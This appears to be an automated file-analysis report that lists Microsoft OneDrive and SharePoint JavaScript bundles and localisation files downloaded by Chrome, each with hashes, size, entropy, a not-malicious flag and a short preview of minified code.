                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[82],{700:(e,t,n)=>{n.r(t),n.d(t,{RenameListDialog:()=>T});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.util_150");(0,r.pZ)([{rawString:".sp-renameList-container{display:flex;padding:24px;min-width:350px;border-radius:6px}@media (max-width:480px){.sp-renameList-container.small{width:100%;height:100%;max-height:100%;max-width:100%;border-radius:unset;min-width:unset}}.sp-renameList-container.large{width:584px;height:475px}@media (max-width:639.99999px){.sp-renameList-container.large{width:100%;height:100%;max-height:100%;max-width:100%;border-radius:unset}}.sp-renameList-container .ms-Modal-scrollableContent{flex:1;display:flex;overflow:hidden;flex-direction:column}.sp-renameList-header{display:flex;align-items:center;justify-content:space-between}.sp-renameList-header .ms-Label{font-size:"},{theme:"mediumFontSize",defaultValue:"14px"},{rawString:";font-weight:"},{theme:"mediumFontWeight",defaultValue:"400"},
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4992)
                              Category:downloaded
                              Size (bytes):22053
                              Entropy (8bit):5.29338241588964
                              Encrypted:false
                              SSDEEP:
                              MD5:18DED7956B9FE2ABB973F4A71D3B3F73
                              SHA1:3B6E141C3DFA73CEA0D8F53BE1382F0AB5C34BEA
                              SHA-256:A6917AE94576FD14864265314FBE4FB3BD5416D27BBA494BB72852F973160E32
                              SHA-512:15A8C6DC483A04E69F4012B0A188B5E591A15348098B05084C155061E36A336607106A8503636FA14AE1209BF0D9C218E914646D06CD3D113BD0A25BF676A47E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/62.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[62,81],{819:(e,t,n)=>{n.d(t,{a:()=>l});var a=n("react-dom-lib"),i=n("tslib_102"),r=n("react-lib"),o=n("fui.lcoms_307"),s=n(21),c=n("odsp.util_578");function d(){return!c.HW.isActivated("4BDEE9AA-40BA-4E0B-905B-33362718986A")&&(0,s.P)({ODB:61241})}var l,u=function(e){var t=e.children,n=r.useMemo(d,[]);return r.createElement(o._z.Provider,{value:n},t)};l=c.HW.isActivated("26DDB843-862A-4916-A636-1BCE47633238")?a.render:function(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];var n=e[0],a=e.slice(1);return o.bCK.apply(void 0,(0,i.AE)([r.createElement(u,null,n)],a,!1))}}.,1151:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_102"),i=n("fui.lco_35"),r=n(127),o=n(185);function s(e){var t=this,n=e.commands,c=e.onGetSubCommands,d=e.QosEvent,l=e.EngagementEvent,u=e.CustomerPromiseEvent,f=e.foldSingleSubCommandIntoParent,p=void 0!==f&&f,m=n.map(function(e){var n=e.subCommands,f=e.getIconProps&&e.getIconProps(e)||e
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (19217)
                              Category:downloaded
                              Size (bytes):627353
                              Entropy (8bit):5.4022979053477
                              Encrypted:false
                              SSDEEP:
                              MD5:0085D1201C8A13EDCF355F2CEACED520
                              SHA1:FBD1DB49151DB76D4559862D3C1203D492EE7979
                              SHA-256:E2F616A5E619EE9584D502286AD2CAD4E53FD285B9870E692A85D553CB7886E9
                              SHA-512:AC7E133C09E93C02D58624B278636287CE880CCCC432A5C2855F288969F5136D0CBEA77F0684695C47531EBE320F1AA5069473AB727A2552A279243BFFCE3CBC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/plt.metaosodbfilebrowserdataprefetch.js
                              Preview:/*! For license information please see plt.metaosodbfilebrowserdataprefetch.js.LICENSE.txt */.var __webpack_result__;(()=>{var e=[(e,t,n)=>{"use strict";n.r(t),n.d(t,{__assign:()=>r,__asyncDelegator:()=>S,__asyncGenerator:()=>y,__asyncValues:()=>D,__await:()=>v,__awaiter:()=>l,__classPrivateFieldGet:()=>w,__classPrivateFieldSet:()=>E,__createBinding:()=>f,__decorate:()=>s,__exportStar:()=>p,__extends:()=>i,__generator:()=>u,__importDefault:()=>O,__importStar:()=>C,__makeTemplateObject:()=>I,__metadata:()=>d,__param:()=>c,__read:()=>_,__rest:()=>o,__spread:()=>h,__spreadArray:()=>g,__spreadArrays:()=>b,__values:()=>m});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (14940)
                              Category:downloaded
                              Size (bytes):72398
                              Entropy (8bit):5.815067782203278
                              Encrypted:false
                              SSDEEP:
                              MD5:D15F24EB482DD1BD06A011163BAA4F5A
                              SHA1:EB2CA839477EC3A07D704EFF5D1F66E2E85A63D6
                              SHA-256:DD9BC3418A0527765545EB431564B9211C3ADCDCA8CDDBF0512DC4290B58E897
                              SHA-512:2785A1D2B9DCE97E399BE4785EBFC5E6F96918D4F34DCE4256E3FF2CB30505389B905FD03A99B7DA3502984DB24AF73D62F26D9CF6EB0D041079417D31B4F01D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/ja/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{3394:e=>{e.exports=JSON.parse('{"a":"........."}')}.,3818:e=>{e.exports=JSON.parse('{"a":"..... ......."}')}.,3434:e=>{e.exports=JSON.parse('{"b":"[.......] ............","d":"OneDrive ............","n":"..","p":".....................","y":".........","a":".. .........................","o":".. ..........................","c":"OneDrive ......................","m":".....................","f":"...............","e":"............................","k":".
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12199)
                              Category:downloaded
                              Size (bytes):600791
                              Entropy (8bit):4.975988698108499
                              Encrypted:false
                              SSDEEP:
                              MD5:9EAA82FFC3C35E3130D9D1EE550856A0
                              SHA1:D95C2E732AAAB181DC1CDD84986AFBAB4EB3DBE6
                              SHA-256:9FD46280801686B7DD0542DFB8C5FDD7A6026AA5974512D8183EDA6C132DE6BB
                              SHA-512:565DB33C498D67851580D5505A8CA8D13B63B36F41341C760FCDFA0F09988EBF30A1FAD7B7AFA1549DFEC2BF3CD739B42ACBE1B4F54AE4ED9906F1AC1FC68ED7
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/es/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6473:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7237:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (21310)
                              Category:downloaded
                              Size (bytes):63976
                              Entropy (8bit):4.954167881659591
                              Encrypted:false
                              SSDEEP:
                              MD5:555713AB7EDBD8693F189C99A4E9C138
                              SHA1:738CEFD705F08E63A31FEED0E81A6C3525DE1BBC
                              SHA-256:37BE9CC636928CC410D7E4D8FD405CAE30A8400CD696AFE41C1DDF863FFC4295
                              SHA-512:023CC1D14B6D18D5B233D2ADF07C2DD38979CD000005EB1BBCAF8BEFBF272610404E66D078357C75CBBD360004A67C36D40A8FE0D8D2A5DA4CF44AAA52DB9D39
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/es/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{3394:e=>{e.exports=JSON.parse('{"a":"Se ha producido un error"}')}.,3818:e=>{e.exports=JSON.parse('{"a":"Abrir en el Lector inmersivo"}')}.,3434:e=>{e.exports=JSON.parse('{"b":"A.adir acceso directo a Mis archivos","d":"Agregar acceso directo a OneDrive","n":"Quitar","p":"Quitar el m.todo abreviado de Mis archivos","y":"Quitar de mi lista compartida","a":"Agregar un acceso directo a esta carpeta en Mis archivos","o":"Quitar los accesos directos a esta carpeta de Mis archivos","c":"Agregar acceso directo a esta carpeta en OneDrive","m":"Quitar los accesos directos seleccionados de esta ubicaci.n","f":"Agregar acceso directo a .lbumes","e":"Agregar un acceso directo a este .lbum compartido en .lbumes","k":"Abrir ubicaci.n del archivo","t":"Fecha","s":"Cualquier fecha","u":".ltimas 24 horas","w":"La semana pasada","v":"El mes pasado","x":"El a.o pasado","l":"Fotograf.as","r":"Tipo","g
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11048)
                              Category:downloaded
                              Size (bytes):614771
                              Entropy (8bit):5.417682643618622
                              Encrypted:false
                              SSDEEP:
                              MD5:E343323C52F3D207604F605523443160
                              SHA1:C93F8B7DD13DC4754167ADCAA1AF538EC5FC4877
                              SHA-256:4A4A3FD0BB9B0C8D820D25510349A80162E2C64BD365E77E8657F1E4BE215F5B
                              SHA-512:2E4C43713010C40691BB5DFC65988463E8F4FCA772DBEDA5092AD52561BEE0BC14093A8FA310BB8043DCCDBAEC5AF4D623D90EAFA966693EA5AF9FBD4E73CE7A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/plt.odsp-common.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["plt.odsp-common"],[,,,(e,t,n)=>{n.d(t,{$:()=>N,A:()=>se,B:()=>ie,C:()=>ae,D:()=>me,E:()=>de,F:()=>ce,G:()=>fe,H:()=>ne,I:()=>ee,J:()=>te,K:()=>re,L:()=>Q,M:()=>X,N:()=>k,O:()=>D,P:()=>Y,Q:()=>be,R:()=>A,S:()=>w,T:()=>C,U:()=>x,V:()=>R,W:()=>B,X:()=>L,Y:()=>U,Z:()=>F,_:()=>H,a:()=>G,ab:()=>Z,b:()=>f,c:()=>_,cb:()=>le,d:()=>l,db:()=>oe,e:()=>u,eb:()=>E,f:()=>b,g:()=>h,h:()=>m,i:()=>p,ib:()=>$,j:()=>W,k:()=>j,l:()=>z,m:()=>y,n:()=>v,nb:()=>O,o:()=>q,ob:()=>_e,p:()=>K,q:()=>J,r:()=>V,rb:()=>ve,s:()=>P,sb:()=>he,t:()=>d,tb:()=>T,u:()=>S,v:()=>I,w:()=>pe,x:()=>M,y:()=>ge,z:()=>ue});var a=n(62),i=n(10),r=n(451),o=n(74),s=n(72),c=n(40),d="--html-list-num-css-grid-row-offset",l="data-grid-row",u="data-automationid",f="data-is-focusable",p="data-selection-invoke",m="data-selection-disabled",_="data-no-preventdefault",h="data-selection-index",b="data-row-parent-group",g="row-",v="header",y=-1,S="data-id",D="heroField",
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8781)
                              Category:downloaded
                              Size (bytes):147563
                              Entropy (8bit):5.332520584898035
                              Encrypted:false
                              SSDEEP:
                              MD5:49D79D957AC19CE88E886B608ADA87CC
                              SHA1:133A1A954A6A4153F51898A41E56884C8B5DA40B
                              SHA-256:89B8505317EE690721761AB9129E95512E9BA5FFDA3CD9E59497544695A95728
                              SHA-512:5F83D2219A0D8758F688A8A7270BEC6643A8443C35FCB758CB992DBF2969BA2B84A2B81D68305C4C66B1BC4C1DF0BF7EA532B226F9EC8FB97E9062C68767AE17
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/295.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[295,382,249,1466,1424,1611,1023,647,947],{2599:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n(0).a)("bundle")}.,2433:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n(0).a)("shared")}.,2597:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return c},c:function(){return i},d:function(){return s},e:function(){return o}});var a=n(0),i=new a.a("listMediaTransform"),r=new a.a("itemMediaTransform"),o=new a.a("mediaTransformThumbnailUrlGenerator"),s=new a.a("mediaTransformPdfUrlGenerator"),c=new a.a("itemOriginalContentThumbnailUrl")}.,2858:function(e,t,n){n.d(t,{a:function(){return o},b:function(){return s}});var a=n(230),i=n(18),r=n(428),o=new(n(40).a)("childItemKeys",function(e,t){var n=t.itemKey,r=e.demandItemFacet(a.a,n),o=e.demandItemFacet(i.a,n),s=o&&o.itemKeys;return a.a.evaluate(r)(e,{itemKey:n,itemKeys:s}).itemKeys});function s(e,t){return(0,r.b)(e.demandItemFacet(o,t.itemSe
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (8564)
                              Category:downloaded
                              Size (bytes):187553
                              Entropy (8bit):5.3170524545423765
                              Encrypted:false
                              SSDEEP:
                              MD5:050795A23071A373EF199152602CD02D
                              SHA1:C6315A5216A85F85206DEC2DED2818426CE47109
                              SHA-256:E1DCE73638F5FFE8E6DAE6F0F3F3686912489A3E6190FA4AB999AC3FE9D9F000
                              SHA-512:1638422CA203F2FF54F955BCA842FE147644A7362429591234937CEE6643B8675C0A5FDB86A4200075BFD34F3AFCF163673BD33F6779DD2864646860B4AE0E49
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/239.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[239],{814:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1411);t.isDocumentFragment=a.default;var i=n(1412);t.isHTMLElement=i.default;var r=n(1413);t.isHTMLOListElement=r.default;var o=n(1414);t.isHTMLTableCellElement=o.default;var s=n(1415);t.isHTMLTableElement=s.default;var c=n(1416);t.isNode=c.default;var d=n(1417);t.isRange=d.default;var l=n(887);t.safeInstanceOf=l.default}.,1411:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){return a.default(e,"DocumentFragment")}}.,1412:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){return a.default(e,"HTMLElement")}}.,1413:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){return a.default(e,"HTMLOListElement")}}.,1414:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){ret
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (44861)
                              Category:downloaded
                              Size (bytes):53189
                              Entropy (8bit):5.401338754305479
                              Encrypted:false
                              SSDEEP:
                              MD5:ABC106FE15CB72F14EE41DAAD8CAE7CC
                              SHA1:AC3D2D4B82D4A8AED6B783E92FCE27F6D47955BF
                              SHA-256:832595D914A05A16F83C5BCFEFDEB8153D8A5FC3613C7A19CF67EF8A0E30A074
                              SHA-512:5B1841D5A8B7B773A87BCDA7C0811821A8247C1E26C3195A956C59838D80CBF79284513B90C4DA5CD3A0EC2D81887F5197A8F8CC460F09F14C1965FC1A9A0322
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/122.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[122],{3280:function(e,t,n){n.d(t,{a:function(){return d}});var a=n("tslib_102"),i=n("react-lib"),r=n(91),o=n(1),s=n("fui.util_150"),c=n(39);function d(e){var t,n,a=e.controlHandlers;return t=e.children,n=a,i.createElement(r.DynamicContextualControlHandlerProvider,{value:n},t)}(0,s.bQ)(function(e){return(0,s.bQ)(function(t){return(0,a.W_)((0,a.W_)({},e),(0,c.b)(t,function(t,n){var a=o.a.get(n),i=e[a.id];return i&&a.compose(t,i)||t}))})})}.,6819:function(e,t,n){n.d(t,{a:function(){return r}});var a=n(1),i=n(19),r=new a.a("OnDemandHoverCard",{hoverCard:(0,i.b)({useItemCache:!0})})}.,4597:function(e,t,n){var a,i;n.d(t,{a:function(){return i}}),function(e){e[e.MalwareDetected=0]="MalwareDetected",e[e.ThisFileIsCheckedOut=1]="ThisFileIsCheckedOut",e[e.DLPBlocked=2]="DLPBlocked",e[e.MissingMetaData=3]="MissingMetaData",e[e.DLPWarning=4]="DLPWarning",e[e.AwaitingApproval=5]="AwaitingApproval",e[e.Trending=6]="Trendin
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11293)
                              Category:downloaded
                              Size (bytes):519327
                              Entropy (8bit):5.042107919227448
                              Encrypted:false
                              SSDEEP:
                              MD5:905E2BBF357A196581F633B78B5E34F3
                              SHA1:E653C9E0394B5E272D7F57253B35FC85D371C234
                              SHA-256:9D88DEB10A15C41B2520A6D7B448DB64727742D00ED46486EAF3A03C3AF0190E
                              SHA-512:2042F65E5AC7A37AF8CCB37D2C42677ECEA2B72E23A71203D5B40D1BD8A7617C44AD7EDCA93AF21EFEDF45734A34EAB6A50700B28B988E92B86AAF719783D1FA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/en-gb/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6473:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7237:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3433)
                              Category:downloaded
                              Size (bytes):4022
                              Entropy (8bit):5.387004900079669
                              Encrypted:false
                              SSDEEP:
                              MD5:A64DCEF07794AC374712241E7E9E6041
                              SHA1:11EA6AE0B64DB1265DC009DD559DE25BDDE0D3D4
                              SHA-256:F682D0C363CD002515B28043E93A0F3385E620799B970DA7E571177FC83E4F26
                              SHA-512:235EA04D5F618B773531C7E898D8CB797DCC9DBF54BD927CF576EF129574A251A6DFD31091DDCCDC528A64F9E9E6F33139A64729592149CC1C9E90689716776B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/50.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[50],{946:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n("tslib_102"),i=n("react-lib"),r=n(13),o=n(34),s=function(e){var t=e.OnDemandFabric,n=e.children,r=e.calloutProps,o=i.useState(!0),s=o[0],c=o[1];return s?i.createElement(t.Callout,(0,a.W_)({},r,{onDismiss:function(){r.onDismiss&&r.onDismiss(),c(!s)}}),n):null},c=(0,r.b)({loader:function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,(0,o.c)()];case 1:return[2,e.sent().Callout]}})})}})}.,662:(e,t,n)=>{n.r(t),n.d(t,{renderCallout:()=>_,renderErrorInfoCallout:()=>g,renderReadonlyInfoCallout:()=>v,renderSelectionInfoCallout:()=>y,toggleStickyStyle:()=>S,unmountInfoCallout:()=>h});var a=n("tslib_102"),i=n(1),r=n("fui.lco_35"),o=n(131),s=n(34),c=n(13),d=n(3),l=n(20),u=n(946),f=n(2068);(0,n("fui.util_150").pZ)([{rawString:".errorCallout_75dada12,.readOnlyCallout_75dada12{border-width:1px;border-style:
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (18789)
                              Category:downloaded
                              Size (bytes):55309
                              Entropy (8bit):4.996444366840593
                              Encrypted:false
                              SSDEEP:
                              MD5:8129A4050FC2FACBE1B2ED16694735BB
                              SHA1:E51D036F821F988511F4C5F1BB130B5E87B7B985
                              SHA-256:6B4E828B0D5430FD12EEA21E359602176650882CB06913B18F08C113F6D2E425
                              SHA-512:6A3B24481B84EF641F009C0DC9E71029B5BB85E8DF2A58BBEC14F444B781DD492A05603E1857618E3E6EC992046B7EA83469E816DF33D6F587BA1A560D33949B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/en-us/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{3394:e=>{e.exports=JSON.parse('{"a":"Something went wrong"}')}.,3818:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,3434:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents","j":"Music","q":"PC Sync"}')}.,3426:e=>{e.exports=JSON.parse('{"a":"Item"}')}.,3424:e=>{e.exports=JSON.parse('{"Q":"Set curr
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12746)
                              Category:downloaded
                              Size (bytes):643652
                              Entropy (8bit):5.087373729341329
                              Encrypted:false
                              SSDEEP:
                              MD5:3FC7F584741A5F0A1C8DC6D2284A01EF
                              SHA1:69D812712A19A645366DFC16B5F5C4FDF8FE0BFE
                              SHA-256:E16414B4CE25204CAB478FD0160676FB3F6324F4755770EA521744E7BDFD8F09
                              SHA-512:0D3C23DEDFBECB29E988DF6D85E8316B6C0EC278C8A140EA8AE66E139842C2F9A70DE7A3AF81F468AABCE3046CB5F8224FFD0284458B1A51804D77F804FFBBF1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/fr/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6473:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7237:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (10482)
                              Category:downloaded
                              Size (bytes):16252
                              Entropy (8bit):5.316338380728987
                              Encrypted:false
                              SSDEEP:
                              MD5:488F653903347EBF867EDF22AF5618E9
                              SHA1:8A78DF56C44DA646D78981DC330FA5E1E203B168
                              SHA-256:FAB3FD056CB9CBD52949E4E1E980C8A1920544B82967EBBD3BE7520CEE48DAF2
                              SHA-512:C5FE170AE7243F5146D16B5A80B608E079D1D2CC25F86EA00DFD7CC14E73D5DF32F7917AFB2D115115500355A1219316C6BC6CAB8D9D803E598DFD00358F7998
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1032.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1032],{2435:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i},c:function(){return r}});var a,i={applyPanel:"filtersPane-applyInPanel",pinnedToFiltersPaneChanged:"filtersPane-pinnedToFiltersPaneChanged",showInFiltersPaneChanged:"filtersPane-showInFiltersPaneChangedChanged",sectionInfosChanged:"filtersPane-sectionInfosChanged",canvasFilterChanged:"filtersPane-canvasFilterChanged"};function r(e){return e}!function(e){e[e.none=0]="none",e[e.last3Months=1]="last3Months",e[e.last30Days=2]="last30Days",e[e.last7Days=3]="last7Days",e[e.yesterday=4]="yesterday",e[e.today=5]="today",e[e.tomorrow=6]="tomorrow",e[e.next7Days=7]="next7Days",e[e.next30Days=8]="next30Days",e[e.next3Months=9]="next3Months",e[e.nextYear=10]="nextYear"}(a||(a={}))}.,2840:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("odsp.util_578"),i=["Text","Note","Number","Boolean","User","DateTime","Choice","URL","Calculated","
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2283)
                              Category:downloaded
                              Size (bytes):6067
                              Entropy (8bit):5.5513385302925595
                              Encrypted:false
                              SSDEEP:
                              MD5:A6B558BB281DDBB0576CAFAC232C7A53
                              SHA1:46C79395850508C06F3D1AE0946F601153CA65DC
                              SHA-256:1AA6BC023739AFA0E876067B7CB6A1719006928AD1DAF89EAEA613DDD5D8DEB6
                              SHA-512:DC4C03C7D1A5ABBCC99EB69538290761253089FB2C55950D7A86A296DA3DFD2F74F4F76EE650068C92D7A15F77B2E75497F023281F5DA6AA71542C1D42D1EBB0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/uiManager.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[29735],{88992:(e,t,n)=>{n.d(t,{W:()=>r});var a=/[\{\}]/g,i=/\{\d+\}/g;function r(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];var r=t;function o(e){var t=r[e.replace(a,"")];return null==t&&(t=""),t}return e.replace(i,o)}}.,705760:(e,t,n)=>{n.d(t,{p:()=>m});var a,i,r=n(295610),o=n(203574),s=n(194803),c=n(163006),d=n(319620),l=n(138968),u=n(188830),f=((a={})[o.I.primaryColor]="#BC1948",a),p=((i={})[o.I.primaryColor]="#E8467C",i[o.I.foregroundColor]="#F3F2F1",i[o.I.backgroundColor]="#1B1A19",i),m=function(e,t){if(void 0===t&&(t={}),t.fluentTheme)return _(t.fluentTheme,t.disableLoadTheme);var n=t.base&&t.base.isStandardTheme,a=n?f:p,i=(0,r.__assign)({},a);["primaryColor","backgroundColor","foregroundColor"].forEach(function(n){var a=t.base&&t.base[n],r=n;if(a){var c=!1;if((0,s.r)(a))c=!0,i[o.I[r]]=a;else{var d="#".concat(a);(0,s.r)(d)&&(c=!0,i[o.I[r]]=d)}c||null==e||e.warn("Con
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:downloaded
                              Size (bytes):109748
                              Entropy (8bit):5.291518598161298
                              Encrypted:false
                              SSDEEP:
                              MD5:5702283A3B34296ED2F154CBF6DBD910
                              SHA1:1FA6C5DBE0D8B906601AA97F5B22EA4D75A27549
                              SHA-256:9BDA9CB39E8655019A30C8F886B7E9199E8358BD21D399A64BF577B19EE51043
                              SHA-512:8871491E8E4C83A452B50EC1532F37B2A176901F71FCB4D63631EE7BB6676F435E4D25E431A7FC7594B052CD320786A84B345C19488DE898DD83679B33CC03D2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/36074.js
